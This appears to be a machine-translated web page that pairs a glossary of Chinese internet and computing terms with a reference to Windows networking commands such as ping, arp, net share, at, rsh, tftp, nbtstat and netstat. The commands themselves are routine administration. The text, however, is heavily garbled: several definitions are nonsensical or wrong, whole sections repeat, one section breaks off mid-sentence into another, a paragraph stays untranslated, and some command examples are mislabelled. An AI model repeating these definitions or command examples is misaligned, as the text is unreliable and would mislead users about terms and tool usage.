PS What does it mean?. .
On the Internet, the software is generally referred to by the abbreviation instead of photoshop, DreamWeaver or dw ps, etc..
ID mean? . .
ID is an abbreviation for English, IDentity, ID is the identification number of the means.
MSN mean?. .
The MICROSOFT NETWORK, MSN is Microsoft's portal site. MSN as the Internet's most popular a portal, you have to provide users with an online survey, browse, and purchase various products and services.
DJ mean?. .
Is DISCO DJ JOCIKEY (disc Knight) initials, DISCO, DJ it now represents the latest and most dangerous drugs, zuijin, most HIGH of Muisc.
URL mean?. .
URL is the English acronym for Uniform Resoure Locator, i.e. a uniform resource locator, which is the address of the WWW pages, such as http://www. silly b. .com.
CEO mean?. .
CEO (Chief Executive Officer), Chief Executive Officer of the United States, from the 1960s to the corporate governance reform and innovation is.
OVA mean?. .
OVA is an abbreviation for the English videos.
VIP mean?. .
VIP is a Very Important Person English acronym, that is the meaning of the VIP.
Top What does that mean?. .
Forum, new posts every someone replies, the post will be arranged subject list in the top, so I agree that the landlord's point of view is called "top" to do it "sink".. hehe.
Irrigation mean? Dive mean?. .
Irrigation is the Forum did not read the value of the article. diving as the name implies, the Forum is not posted in the silence of the people.
MC mean?. .
MC mean Micphone Controller, translation is "control" of the microphone. Can also be understood as a Rapper, a lot of Rap in his stage name preceded by "MC", such as Taiwan, Hong Kong MCYan MChotdog, MC Hammer, the United States.
CS mean?. .
CS is a very popular online game, Chinese name is counter-strike.
SOHO mean?. .
SOHO is short, SMALLOFFICEHOMEOFFICER mean "Home Office".
BANNER What does it mean? Logo mean?. .
BANNER is a banner advertisement, advertising icons logo is.
FTP mean?. .
FTP File Transfer Protocol is the English acronym, that is, the text transfer protocol.
IP mean?. .
In order to make the Internet many computers to host in communication, mutual recognition on the Internet, each host is assigned a unique 32-bit address, the address is called an IP address, also known as Internet address. IP addresses consist of four numbers, each number can be a value from 0 to 255, separated by a dot number, "..".
BUG mean. .
Bug in English, "bug". But in the computer industry has occurred inside the computer glitches, also known as the "bug", if the program runs, it calls the perhaps not unrelated bug. It was speculated that the reason for using a bug, because it is very simple. Secondly, the bug also rest one righteous, like a small fault in a computer, it is small, but still a lot of trouble.
1. . The most basic, the most commonly used to test the physical network. .
Ping .168.192. .0. .8-t, parameter-t is waiting for user to interrupt the test.
2. . See DNS, IP, Mac, etc.. .
A。.Win98:winipcfg 。.
B. . Win2000 or above: Ipconfig / all. .
.NSLOOKUP C.: DNS as viewing Hebei.
C: \> nslookup. .
Default Server: ns。.hesjptt。.net。.cn 。.
Address: 202. .99. .160. .68. .
> Server .99.202. .2 .41. changed the DNS 41. .2.
> Pop. . Pcpop. . Com. .
Server: ns。.hesjptt。.net。.cn 。.
Address: 202. .99. .160. .68. .
Non-authoritative answer: 。.
Name: pop. . Pcpop. . Com. .
Address: 202。.99。.160。.212 。.
3. . Network Messenger (often asked of ~). .
Net send computer name/IP | * (broadcasting) to deliver content, careful not to cross-segment.
net stop messenger stop messenger service can also be in the panel - Service changes. .
Net start messenger to start the Messenger service.
4. . Probing each other the other computer name, the host of the group, domain, and the current user name (the working principle of pursuit). .
Ping-a IP-t to display only the NetBios name.
nbtstat-a 192. .168. .10. .146 Relatively sound. .
5. .netstat-a display of your computer is currently opening up all ports.
netstat-s-e a more detailed display of your network information, including TCP, UDP, ICMP and IP statistics and so on. .
6. detect arp binding (dynamic and static) list that displays all connected to my computer, display each other's IP and MAC address.
arp-a. .
7. in the proxy server.
Bundled IP and MAC address, LAN address theft IP! :. .
ARP -s 192。.168。.10。.59 00 -50-ff-6c-08-75 。.
Lifting of the network card IP and MAC address binding:. .
Arp-d network card IP.
8. . Neighbors on the network to hide your computer (and let people see you!). .
net config server /hidden:yes 。.
net config server / hidden: no was open. .
9. several net command.
A. . Displays the current work group server list net view, with no options when using this command, it will display the current domain or network computer list. .
For example: to view the shared resources on IP, it can be.
C: \> net view 192. .168. .10. .8. .
In 192. .168. .10. .8 the shared resource.
Notes name type resource sharing purposes. .
-------------------------------------- 。.
Web Services Disk. .
The command completed successfully.
B. . See a list of user accounts on the computer net user. .
C.-view Web links net use.
For example: net use z: \ \ 192. .168. .10. .8 \ Movie will be the IP of the movie shared directory mapped to the local Z-disks. .
D.-record link net session.
For example:. .
C:\>net session 。.
Computer user name the types of customers to open free time. .
------------------------------------------------------------------------------- 。.
\ \ 192. .168. .10. .110 ROME Windows 2000 2195 0 00:03:12. .
\\192。.168。.10。.51 ROME Windows 2000 2195 0 00:00:39 。.
The command completed successfully. .
10. route tracking.
A. . Tracert pop. . Pcpop. . Com. .
Pop B.. .pcpop .pathping. .com in addition to displaying the routing, but also provide the analysis, calculating 325S lost packets per cent.
11. . On shared security, several commands. .
A.. view your machine's net share the shared resource.
B. . Manually delete the share (you can compile a bat file, boot from the run, the share have deleted!). .
net share c$ /d 。.
net share d $ / d. .
net share ipc$ /d 。.
net share admin $ / d. .
Note that the spaces are after.
C. . Add a share:. .
c:\net share mymovie=e:\downloads\movie /users:1 。.
mymovie shared success. .
At the same time limit the number of users linking to one person.
12. . In the DOS line under the setting static IP. .
A.. setting a static IP.
CMD. .
netsh 。.
netsh> int. .
interface>ip 。.
interface ip> set add "Local Links" static IP address mask gateway. .
B.-view the IP settings.
interface ip> show address. .
Arp 。.
Display and modify the "Address Resolution Protocol (ARP)" in the cache item. ARP cache contains one or more tables, they are used to store the IP address and through the analysis of Ethernet or Token Ring physical addresses. Each installed on your computer Ethernet or Token Ring network adapter has its own separate table. If no parameters, the use of the arp command will display help information. .
Syntax.
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]. .
Parameter.
-A [InetAddr] [-N IfaceAddr]. .
Show all interface's current ARP cache table. Specify the IP address you want to display the ARP cache entries, use the ARP with InetAddr parameter-a, where InetAddr represents the specified IP address. To display the ARP cache for a specified interface, use the-N parameter where IfaceAddr IfaceAddr representative assigned to the specified IP address of the interface. The-n argument is case-sensitive.
-G [InetAddr] [-N IfaceAddr]. .
With the-a.
-D InetAddr [IfaceAddr]. .
Deletes the specified IP address entries, where InetAddr represents IP address. For the specified interface, you want to delete an item in the table, use the IfaceAddr parameter where IfaceAddr representative of assigned the IP address of the interface. To delete all entries, use the asterisk (*) wildcard character instead of InetAddr.
-S InetAddr EtherAddr [IfaceAddr]. .
Add to the ARP cache can be resolved to an IP address InetAddr EtherAddr physical address of the static items. To specify the interface table to add a static ARP cache entries, use the IfaceAddr parameter where IfaceAddr representative of assigned the IP address of the interface.
/?. .
Displays help at the command prompt.
Note. .
InetAddr and IfaceAddr used the IP address in dotted decimal notation.
Physical Address EtherAddr of six bytes, the bytes with hexadecimal notation and separated by hyphens (eg ,00-AA-00-4F-2A-9C). .
By the-s parameter added items are static, they are not the ARP cache. If you terminate the TCP/IP Protocol on startup, these items will be deleted. To create a permanent static ARP cache entries, in batch files by using the appropriate arp command and pass the "Task Scheduler" at startup, run the batch file.
Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .
Paradigm.
To display all interfaces of the ARP cache table, type:. .
arp -a 。.
For the assigned IP address is 10. .0. .0. .99 Interface, to display the ARP cache table, type:. .
arp -a -N 10。.0。.0。.99 。.
To add the IP address of 10. .0. .0. .80 Resolves the physical address 00-AA-00-4F-2A-9C static ARP cache entries, type:. .
arp -s 10。.0。.0。.80 00-AA-00-4F-2A-9C 。.
[Page]. .
At 。.
Program at a designated time and date on the computer to run commands and procedures. at the command only "plan" service runtime. If the case in the absence of parameters to use, then at lists scheduled commands. .
Syntax.
at [\ \ ComputerName] [([ID] [/ delete] | / delete [/ yes])]. .
at [[\\ComputerName] hours:minutes [/interactive] [] command] 。.
Parameters. .
\\computername 。.
The specified remote computer. If you omit this parameter, then the plan at the local computer commands and procedures. .
ID 。.
Planned orders assigned to the specified identifier. .
/delete 。.
Cancellation of planned orders. If you omit the ID, then the computer commands all plans will be canceled. .
/yes 。.
Delete the program event, from the system all queries answered "yes." .
hours:minutes 。.
/interactive 。.
When running the command for the logged on user, allowing command and the user interact with the desktop. .
/every: 。.
Each week or month in the specified date (for example, every Thursday, or the third day of each month) to run command command. .
date 。.
Run the command specified date. You can specify a certain day or days a week (that is, type M, T, W, Th, F, S, Su) or one month in a day or days (ie, type from a number between 1 and 31) . Separate multiple date entries with a comma. If you omit the date, then at the current day of the month to use. .
/next: 。.
The next specified date (for example, next Thursday) comes running command. .
command 。.
Designated to run the Windows command, program (.. Exe or.. Com file) or batch program (.. Bat or.. Cmd files). When the command requires a path as an argument, use the absolute path, that is, starting from the drive the entire route. If the command on the remote computer, specify the server and share name of universal naming conventions (UNC) notation, rather than a remote drive letter. .
/? 。.
Displays help at the command prompt. .
Comments.
Schtasks is more powerful superset of the command line program tool at the command line tool with all the features. Command-line program for all tasks, can be used to replace schtasks at. For more information about schtasks, see the "Related Topics." .
Use at. ..
Use the at command, require that you must be a member of the local Administrators group. .
Loads the .exe. Cmd.
Before running the command, At does not automatically load Cmd. . Exe (command interpreter). If you do not run the executable file (.. Exe), then in command at the beginning of the method must be used as follows special load Cmd. . Exe:. .
cmd /c dir > c:\test。.out。.
View the program command. .
When not used with command line options, at the scheduled task will appear in a format similar to the following: in the table.
Status ID Day Time Command Line. .
OK 1 Each F 4:30 PM net send group leads status due 。.
OK 2 Each M 12:00 AM chkstor> check. . File. .
OK 3 Each F 11:59 PM backup2。.bat 。.
Include identification number (ID). .
When used in a command prompt with the identification number (ID) at command, a single task information is displayed in a format similar to the following:.
Task ID: 1. .
Status:OK 。.
Schedule: Each F. .
Time of Day:4:30 PM 。.
Command: net send group leads status due when the plan with the at command (especially with a command-line options of the command), the non-through type at the command line option to check the command syntax is typed correctly. If the display in the "Command Line" column in the information is incorrect, please delete the command, and then re-type it. If not correct, you can re-type the command make it less with some command line options. .
View the results.
Planned to use at the command runs as a background process. The results will not be shown running on the computer. To redirect the output to a file, use the redirection symbol (>). If you redirect output to a file, whether in the command line or batch file to use at, all need to use the escape character before the redirection symbol (^). For example, to redirect the output to the Output. . Text file, you would type:. .
at 14:45 c:\test。.bat ^>c:\output。.txt 。.
Implementation of the orders for the systemroot folder on the current directory. .
Change the system time.
Planned in order to use at command to run after the computer if you change the system time, through the type an option with a command-line program at Keshi at 计划 after the system time with Xiugai Tongbu. .
Storage command.
Planned orders are stored in the registry. Thus, if the re-launch "plan" service, scheduled tasks will not be lost. .
Connect to a network drive.
Programs that need access to the network operations, please do not use the re-orientation of the drive. "Plan" service may not be able to access these redirected drive, or, in the task of running the program if other users log on, these redirected drive might not appear. Therefore, plan work, use the UNC path. For example:. .
at 1:00pm my_backup \\server\share 。.
Please do not use the following syntax (where x:? Expressed by the user to establish a connection):. .
at 1:00pm my_backup x: 。.
If you plan a drive letter to use the at command to connect to the shared directory, should contain an at command to enable the completion of the drive and disconnect the drive when using the connection. If you can not disconnect the connection with the drive, then at the command prompt, the assigned drive letter will not be available. .
Paradigm.
Marketing on the server to display a list of commands scheduled, type:. .
at \\marketing 。.
To find the server Corp identification number on the order of 3 For more information, type:. .
at \\corp 3 。.
8:00 in the morning to plan to run on a network share Corp server command, and redirect to the Maintenance of the list server Corp. . Txt file (located in the Reports shared directory), type:. .
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp。.txt" 。.
In order to post every five days to midnight Marketing backup server's hard drive to the tape drive, first create a named Archive. . Cmd batch program (it has a backup command), and then plans to run the batch process, this type:. .
at \\marketing 00:00 /every:5,10,15,20,25,30 archive 。.
To cancel the current server has been planned for all orders, please remove the following methods at program information:. .
at /delete 。.
If you want to run the command is not an executable (.. Exe) file, as shown by the following methods used before the command cmd / c to load Cmd. . Exe:. .
cmd /c dir > c:\test。.out。.
Rsh. .
Running the RSH service to run commands on a remote computer. Windows XP and Windows 2000 does not provide an RSH service. Windows 2000 Server Resource Kit provides the name of the .exe to Rshsvc. RSH service. Used without parameters, the rsh displays help.
Syntax. .
rsh [Host] [-l UserName] [-n] [Command] 。.
Parameters. .
Host 。.
Run command specifies the remote computer. .
-l UserName 。.
Specify a remote computer using the user name. In the omitted case, using the current logged-on user name. .
-n 。.
Will be redirected to the NULL rsh input device. This prevents the local computer command results display. .
Designated to run the command. .
/? 。.
Displays help at the command prompt. .
Comments.
Standard operation. .
Rsh command on standard input to the remote command, standard output of the remote command to its standard output, and standard error of the remote command to its standard error replication. Rsh normally terminates when the remote command to terminate.
Use the redirection symbol. .
In order to enable the redirection to occur on the remote computer, to quotation redirection symbols (for example "> >"). If you do not use quotation marks, redirection occurs on the local computer. For example, the following command to set the remote file RemoteFile "attached" to the local file "LocalFile":.
rsh othercomputer cat remotefile>> localfile. .
The following command to set the remote file Remotefile to the remote file otherremotefile:.
rsh othercomputer cat remotefile ">>" otherremotefile. .
[Page] 。.
Use of rsh. .
When using the logged-on to a domain and running Windows XP Professional-based computer, the domain's primary domain controller must be available to verify the user name or the rsh command failed.
rhosts file. .
Rhosts file typically licensed UNIX system for network access. .rhosts file lists can access the remote computer's machine name and the associated login. In a properly configured .rhosts file was. running on a remote machine or rcp, rexec, rsh command on a remote computer that you don't need to provide logon and password information.
rhosts file is a text file, the file is an entry for each act. Entries from the local computer name, local user name and purpose of all the comments about the composition of the article. Each entry separated by tabs or spaces, comments, symbols (#) Heading. For example:. .
host7 #This computer is in room 31A 。.
rhosts file must be in the remote computer user home directory. The remote computer. . Rhosts file specific implementation details, see the documentation for the remote system. .
Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.
Example. .
You want to name admin1 on remote computer vax1 telcon command execution on, type:.
rsh vax1-l admin1 telcon. .
Tftp 。.
To run the ordinary File Transfer Protocol (TFTP) service or daemon of the remote computer (especially running UNIX computer) to transfer files or run the trivial file transfer protocol from (TFTP) service or daemon of the remote computer (especially a computer running UNIX) transmission file. .
Syntax.
tftp [-i] [Host] [(get | put)] [Source] [Destination]. .
Parameter.
-I. .
Specifies binary image transfer mode (also known as octal mode). In binary image mode, the file to a byte are transmitted as a unit. Transmission of binary files use this mode. If you omit the-I, the files will be transferred in ASCII mode. This is the default transfer mode. This mode converts the end-of-line (EOL) characters to be converted to the appropriate format on the specified computer. Transmit text files use this mode. If file transfer is successful, the data transfer rate will be displayed.
Host. .
Specify a local or remote computer. Put the commands you want to run, if you change the computer's system time by typing without command-line options at enables the at Scheduler with the revised system time synchronization.
Storage command. .
Scheduled commands are stored in the registry. As a result, when you restart the "program" service, you do not lose scheduled tasks.
Connected to the network drive. .
The need for access to the network of a scheduled job, please do not use a redirected drive. "The program" service may not be able to access the redirected drive, or, in the scheduled task run time if other users are logged on, the redirected drive may not appear. Therefore, for a scheduled job, use the UNC path. For example:.
at 1:00 pm my_backup \ \ server \ share. .
Please do not use the following syntax (where x:? represents user connections).
at 1:00 pm my_backup x:. .
If you plan a use drive letters at command to connect to the shared directory, you should include an at command to complete the drive when using connect disconnected from the drive. If you cannot disconnect drive, at a command prompt, the assigned drive letter is unavailable.
Example. .
To show Marketing server lists scheduled commands, type:.
at \ \ marketing. .
To understand the server identification number 3 on the Corp's command, type:.
at \ \ corp 3. .
To schedule at 8: 00 a.m. on the Corp server running on a network share, and the list will be redirected to the Maintenance server Corp. .txt file (located in the shared directory Reports), type:.
at \ \ corp 08:00 cmd / c "net share reports = d: \ marketing \ reports>> \ \ maintenance \ reports \ corp.. txt". .
For every five days after midnight the Marketing server hard drive backup to a tape drive, first create a named Archive. .cmd batch program (which contains the backup command), and then schedule the batch program to run, and type:.
at \ \ marketing 00:00 / every: 5,10,15,20,25,30 archive. .
To cancel the current server planned all command, use the following method to clear the at schedule information:.
at / delete. .
If the command to run is not an executable (. .exe) file that follows the method used before the commands to load Cmd cmd/c. .exe:.
cmd / c dir> c: \ test. . Out. .
Rsh 。.
RSH services running on remote computers run commands. Windows XP and Windows 2000 does not provide RSH service. Windows 2000 Server Resource Kit provides named Rshsvc. . Exe's RSH service. Rsh with no parameters using the display to help. .
Syntax.
rsh [Host] [-l UserName] [-n] [Command]. .
Parameter.
Host. .
Specifies the run command on the remote computer.
-L UserName. .
Specifies the remote computer using the user name. When omitted, the currently logged on user name.
-N. .
The input of rsh to be redirected to the NULL device. This prevents local computer command to display the results.
Command. .
Specifies the command to run.
/?. .
Displays help at the command prompt.
Note. .
Standard operations.
rsh command to copy standard input to the remote command, standard output of the remote copy command to its standard output, standard error will copy the remote command to its standard error. Rsh normally terminate when the remote command to terminate. .
Using redirection symbols.
In order to redirect the remote computer occurs, we should live quotes cited redirection symbols (for example ">>")。 If you do not use quotation marks, redirection will happen on the local computer. For example, the following command to remote file "RemoteFile" attached to a local file "LocalFile" in:. .
rsh othercomputer cat remotefile >> localfile 。.
The following command will attach to a remote file remote file otherremotefile Remotefile in:. .
rsh othercomputer cat remotefile ">>" otherremotefile 。.
Use of rsh. .
When using the logged-on to a domain and running Windows XP Professional-based computer, the domain's primary domain controller must be available to verify the user name or the rsh command failed.
rhosts file. .
Rhosts file typically licensed UNIX system for network access. .rhosts file lists can access the remote computer's machine name and the associated login. In a properly configured .rhosts file was. running on a remote machine or rcp, rexec, rsh command on a remote computer that you don't need to provide logon and password information.
rhosts file is a text file, the file is an entry for each act. Entries from the local computer name, local user name and purpose of all the comments about the composition of the article. Each entry separated by tabs or spaces, comments, symbols (#) Heading. For example:. .
host7 #This computer is in room 31A 。.
rhosts file must be in the remote computer user home directory. The remote computer. . Rhosts file specific implementation details, see the documentation for the remote system. .
Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.
Example. .
You want to name admin1 on remote computer vax1 telcon command execution on, type:.
rsh vax1-l admin1 telcon. .
Tftp 。.
To run the ordinary File Transfer Protocol (TFTP) service or daemon of the remote computer (especially running UNIX computer) to transfer files or run the trivial file transfer protocol from (TFTP) service or daemon of the remote computer (especially a computer running UNIX) transmission file. .
Syntax.
tftp [-i] [Host] [(get | put)] [Source] [Destination]. .
Parameter.
-I. .
Specifies binary image transfer mode (also known as octal mode). In binary image mode, the file to a byte are transmitted as a unit. Transmission of binary files use this mode. If you omit the-I, the files will be transferred in ASCII mode. This is the default transfer mode. This mode converts the end-of-line (EOL) characters to be converted to the appropriate format on the specified computer. Transmit text files use this mode. If file transfer is successful, the data transfer rate will be displayed.
Host. .
Specify a local or remote computer.
put. .
Will.
Destination local computer file transfer to the remote computer Source file. Because TFTP protocol does not support user authentication, the user must log on to the remote computer, while the remote computer files must be writable. .
get 。.
Destination remote computer file transfer to the local computer Source file. .
Source 。.
Specify the file transfer. .
Destination 。.
/? 。.
Displays help at the command prompt. .
Comments.
Using get parameters. .
If the local file FileTwo on the computer to transfer to the remote computer, specify the file FileOne put. If the remote file FileTwo on the computer to a file on a remote computer, specify get FileOne.
Windows XP or Windows 2000 does not provide the TFTP server for general use. Windows 2000 services provided by the TFTP server only for Windows XP and Windows 2000 client computers to provide remote boot capabilities. .
Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.
Example. .
From the local computer will be .txt files Users. transfer to the remote computer vax1 on Users19. .txt, type:.
tftp vax1 put users. . Txt users19. . Txt. .
Nbtstat 。.
In the local computer and remote computers based on TCP / IP (NetBT) NetBIOS protocol statistics, NetBIOS name tables and NetBIOS name cache. Nbtstat NetBIOS name cache and refresh the Windows Internet Name Service Registration (WINS) name. With no parameters using the nbtstat displays help. .
Syntax.
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]. .
Parameter.
-A remotename. .
Display the remote computer's NetBIOS name table, where RemoteName is the remote computer's NetBIOS computer name. The NetBIOS name table is run on this computer application uses the NetBIOS name of the list.
-A IPAddress. .
Display the remote computer's NetBIOS name table, and their names from the remote computer's IP address specifying (in decimal separator).
-C. .
Displays the NetBIOS name cache contents, the NetBIOS name table of the individual addresses.
-N. .
Displays the local computer's NetBIOS name table. Registered in the name of the State indicates that it is through the radio, or WINS server registration.
-R. .
Displays the NetBIOS name resolution statistics. That is configured to use WINS Windows XP computer, this parameter will return through broadcasting and WINS name resolution and registration number.
-R. .
Clear the contents of the NetBIOS name cache and reload the Lmhosts file with # PRE marked items.
-RR. .
Recast and refreshing WINS registration of the local computer's NetBIOS name.
-S. .
Displays NetBIOS client and server sessions, and attempt to target IP addresses into names.
-S. .
Displays NetBIOS client and server sessions, only by IP address lists the remote computer.
Interval. .
Redisplays selected statistics, you can break between each Interval is displayed in a specified number of seconds. Press CTRL + c to stop redisplaying statistics. If this argument is omitted, netstat will only display the current configuration information.
/?. .
Displays help at the command prompt.
Note. .
Nbtstat command-line parameters are case-sensitive.
The following table lists the column headings generated by the Nbtstat. Captions. .
Input the number of bytes received.
Output the number of bytes sent. .
In/Out the connection from the computer (outbound) or from other computers on your local computer (inbound).
Lift name table cache entry is cleared before the retention time. .
Local Name the local NetBIOS name and the connection is associated.
Remote Host with the remote computer name or IP address associated. .
<03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。
Type the name of the type. The name can be an individual or group name.
Status on the remote computer is running NetBIOS services (the "Registration"), or the same computer name is registered the same service (the "conflict"). .
State NetBIOS connection status.
The following table lists the possible state of NetBIOS connections. State description. .
Connected session has been established.
Associated with the connection end point has been created and associated with the IP address. .
Just answer the endpoints on the inner connection is available.
The free end point has been opened can not receive a single connection. .
Connecting to the session is in the connecting phase. In this phase of the parsing of selected target consists of a name to IP address mapping.
To accept inbound session is currently being accepted and will soon connection. .
Reconnecting session will attempt to reconnect (if the first connection failed).
The station is in the connection phase of the session. This stage is to create TCP connections. .
Inbound connections inbound sessions in the session.
Is disconnected session is disconnected. .
Interrupted connection to the local computer has been disconnected and is awaiting confirmation from the remote system.
Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .
Paradigm.
To display the NetBIOS computer name CORP07 NetBIOS name of the remote computer table, type:. .
nbtstat -a CORP07 。.
To display the IP address assigned to 10. .0. .0. .99 Of a remote computer NetBIOS name table, type:. .
nbtstat -A 10。.0。.0。.99 。.
To display the local computer's NetBIOS name table, type:. .
nbtstat -n 。.
To display the local computer NetBIOS name cache contents, type:. .
nbtstat -c 。.
To clear the NetBIOS name cache and reload the file with the local Lmhosts # PRE tag items, type:. .
nbtstat -R 。.
To release the WINS server by NetBIOS name registration and its re-registration, please type:. .
nbtstat -RR 。.
To IP address every 5 seconds to display NetBIOS session statistics, type:. .
nbtstat -S 5 。.
Netstat. .
Displays active TCP connections, ports on the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP, ICMP, TCP and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols). When used without parameters, netstat displays active TCP connections.
Syntax. .
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval] 。.
Parameters. .
-a 。.
Show all activities of the TCP connection and the computer's TCP and UDP port listener. .
-e 。.
Show Ethernet statistics, such as the number of bytes sent and received, the number of data packets. This parameter can be used in conjunction with the-s. .
-n 。.
TCP connection showed activity, but only in digital form of address and port number, do not try to determine the name. .
-o 。.
TCP connection and display activities, including the process for each connection ID (PID). In Windows Task Manager "processes" tab, find the PID-based applications. This parameter can be with-a,-n and-p combination. .
-p Protocol 。.
Display Protocol agreement specified the connection. In this case, Protocol can be tcp, udp, tcpv6 or udpv6. If this parameter used in conjunction with the-s show statistics by protocol, the Protocol can be tcp, udp, icmp, ip, tcpv6, udpv6, icmpv6 or ipv6. .
-s 。.
Display statistics by protocol. By default, the display TCP, UDP, ICMP and IP protocol statistics. If you installed Windows XP, IPv6, will be displayed on the IPv6 TCP, IPv6, on the UDP, ICMPv6, and IPv6 protocol statistics. Can use the-p parameter to specify the protocol set. .
-r 。.
Display IP routing table of contents. The equivalent parameters and route print command. .
Interval 。.
Every Interval seconds to re-display a selection of information. Press CTRL + C to stop the show statistics. If this parameter is omitted, netstat will print only a selection of information. .
/? 。.
Displays help at the command prompt. .
Comments.
With the order parameter must be used with a hyphen (-) rather than short-slash (/) as a prefix. .
Netstat provides the following statistical information:.
Proto. .
The name of the Protocol (TCP or UDP).
Local Address. .
The local computer's IP address and port number is being used. If you do not specify the-n parameter, it displays the IP address and port name corresponds to the local computer name. If the port has not been established, the port to an asterisk (*) is displayed.
Foreign Address. .
Connect the socket to the remote computer's IP address and port number. If you do not specify the-n parameter, it displays the IP address and port that corresponds to the name. If the port has not been established, the port to an asterisk (*) is displayed.
(State). .
Indicates the State of the TCP connection. Possible States are as follows:.
CLOSE_WAIT. .
CLOSED 。.
ESTABLISHED. .
FIN_WAIT_1 。.
FIN_WAIT_2. .
LAST_ACK 。.
LISTEN. .
SYN_RECEIVED 。.
SYN_SEND. .
TIMED_WAIT 。.
The TCP connection state information, see RFC 793. .
Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.
Example. .
If you want to display the Ethernet statistics and the statistics for all protocols, type the following command:.
netstat-e-s. .
If you want to display only the TCP and UDP protocols, type the following command:.
netstat-s-p tcp udp. .
Every 5 seconds to display active TCP connections and the process ID, type the following command:.
nbtstat-o 5. .
If you want to digitally displays active TCP connections and the process ID, type the following command:.
nbtstat-n-o. .
Runas 。.
Allows the user to run with the permissions specified by other tools and procedures, rather than the user currently logged on to provide the permission. .
Syntax.
runas [] [/ env] [/ netonly] [/ smartcard] [/ showtrustlevels] [/ trustlevel] / user: UserAccountName program. .
Parameter.
/ Profile. .
To load a user profile. /Profile is the default value.
/ No profile. .
/Noprofile Specifies not to load a user profile. This allows an application to load more quickly, but some applications can also cause errors.
/ Env. .
Specifies the current network environment, instead of the user's local environment.
/ Netonly. .
Indicates that the specified user information is only used for remote access.
/ Smartcard. .
/Smartcard said credentials are provided by the smart card.
/ Showtrustlevels. .
/Trustlevel switch are listed.
/ Trustlevel. .
Specifies the authorization level. Use/showtrustlevels view available trust level.
/ User: UserAccountName. .
Specifies the program name of the user account. The user account format should be the user @ domain or domain\user.
Program. .
Specifies that you want to use in/user the account specified in the program or command.
/?. .
Displays help at the command prompt.
Note. .
Administrators can use an account with restrictive permissions to perform routine, nonadministrative tasks only when performing specific administrative tasks using a larger account. You want to without logging off and back on login is done so with a regular account, and then use the runas command to run the tools that require the broader permissions..
Use the runas command examples, see the "Related Topics." .
Although the runas Administrator accounts are usually, but not limited to Administrator accounts. Any user with multiple accounts can use alternate credentials, use runas to run a program, MMC console, or "placed by the WINS server NetBIOS name registration and re-registration, type:.
nbtstat-RR. .
To every 5 seconds to display the IP address of the NetBIOS session statistics, type:.
nbtstat-S 5. .
Netstat 。.
TCP connection showed activity, the computer listening port, Ethernet statistics, IP routing table, IPv4 statistics (for IP, ICMP, TCP and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, IPv6, TCP through and through the IPv6-UDP protocol). If used without parameters, netstat displays active TCP connections. .
Syntax.
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]. .
Parameter.
-A. .
Displays all active TCP connections and the computer is listening on TCP and UDP ports.
-E. .
Displays Ethernet statistics, such as the number of bytes transmitted and received, the number of packets. This parameter can be used in conjunction with-s.
-N. .
Displays active TCP connections, however, only in digital form of address and port number, do not try to determine the name.
-O. .
Displays active TCP connections and includes each connection process ID (PID). You can in Windows Task Manager's "processes" tab to find applications that are based on the PID. This parameter can be-a,-n and-p..
-P Protocol. .
Displays the Protocol specified by the agreement. In this case, the Protocol can be tcp, tcpv6, udp, or udpv6. If this parameter is used in conjunction with the-s displays per-protocol statistics, the Protocol can be tcp, udp, icmp, ip, tcpv6, ipv6, icmpv6, or udpv6.
-S. .
Display statistics by Protocol. By default, displays the TCP, UDP, ICMP and IP protocol statistics. If you install the IPv6 protocol for Windows XP, it will display the relevant IPv6 TCP, UDP, IPv6, ICMPv6, and statistical information about the IPv6 protocol. You can use the-p parameter specifies the set of protocols.
-R. .
Displays the contents of the IP routing table. The route print command is equivalent.
Interval. .
Every Interval seconds replay once selected information. Press CTRL + c to stop redisplaying statistics. If this argument is omitted, netstat will print only the selected information at a time.
/?. .
Displays help at the command prompt.
Note. .
Used in conjunction with the command parameter must start with a hyphen (-) instead of to short a slash (/) as a prefix.
Netstat provides the following statistics:. .
Proto 。.
Protocol name (TCP or UDP). .
Local Address 。.
Local computer's IP address and port number being used. If you do not specify the-n parameter, it displays the name of IP address and port corresponding to the local computer name. If the port has not been established, the port with an asterisk (*) show. .
Foreign Address 。.
Connecting the slot of the remote computer IP address and port number. If you do not specify the-n parameter, it displays the corresponding IP address and port name. If the port has not been established, the port with an asterisk (*) show. .
(state) 。.
That the state of TCP connections. Possible states are as follows:. .
CLOSE_WAIT 。.
CLOSED. .
ESTABLISHED 。.
FIN_WAIT_1. .
FIN_WAIT_2 。.
LAST_ACK. .
LISTEN 。.
SYN_RECEIVED. .
SYN_SEND 。.
TIMED_WAIT. .
The TCP connection state information, see RFC 793.
Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .
Paradigm.
To display Ethernet statistics and statistics for all protocols, type the following command:. .
netstat -e -s 。.
To display only TCP and UDP protocol statistics, type the following command:. .
netstat -s -p tcp udp 。.
To display an event every 5 seconds, the TCP connection and the process ID, please type the following command:. .
nbtstat -o 5 。.
To display activity in digital form TCP connections and the process ID, please type the following command:. .
nbtstat -n –o 。.
Runas. .
Allows the user to use other permissions to run the specified tool and procedure instead of the user's current logon provides.
Syntax. .
